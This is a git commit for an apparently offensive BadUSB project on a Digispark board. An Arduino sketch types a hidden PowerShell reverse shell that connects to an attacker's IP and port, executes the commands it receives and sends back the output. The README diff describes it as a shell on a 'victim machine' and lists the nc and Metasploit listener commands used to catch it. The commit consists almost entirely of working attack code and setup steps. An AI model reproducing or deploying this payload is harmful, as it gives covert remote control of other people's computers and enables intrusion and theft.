This commit is contained in:
humanG0D 2021-10-10 17:29:51 +08:00
parent 00825a3676
commit 76dcb91f7e
2 changed files with 16 additions and 3 deletions

View File

@ -24,7 +24,7 @@ void loop() {
DigiKeyboard.delay(2000);
DigiKeyboard.println("cmd");//run cmd
DigiKeyboard.delay(2000);
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('<YOUR_IP_ADDRESS>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
DigiKeyboard.delay(5000);
digitalWrite(1, HIGH); //turn on led when program finishes
DigiKeyboard.delay(90000);

View File

@ -2,10 +2,23 @@
### Description:
#### 1: Install_Shell.ino:<br>
#### 1: Instant_Shell.ino:<br>
Starting instant shell to an attacker machine in less than 1 minute.<br>
**Instuctions:**<br>Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.<br>
**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/)
Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html)
**Instructions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer.
```
nc -lvnp 4444
```
```
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP_ADDRESS>; set lport 4444; set ExitOnSession false; exploit -j"
```
**Tested on:**<br>
**OS**: Windows 10|11<br>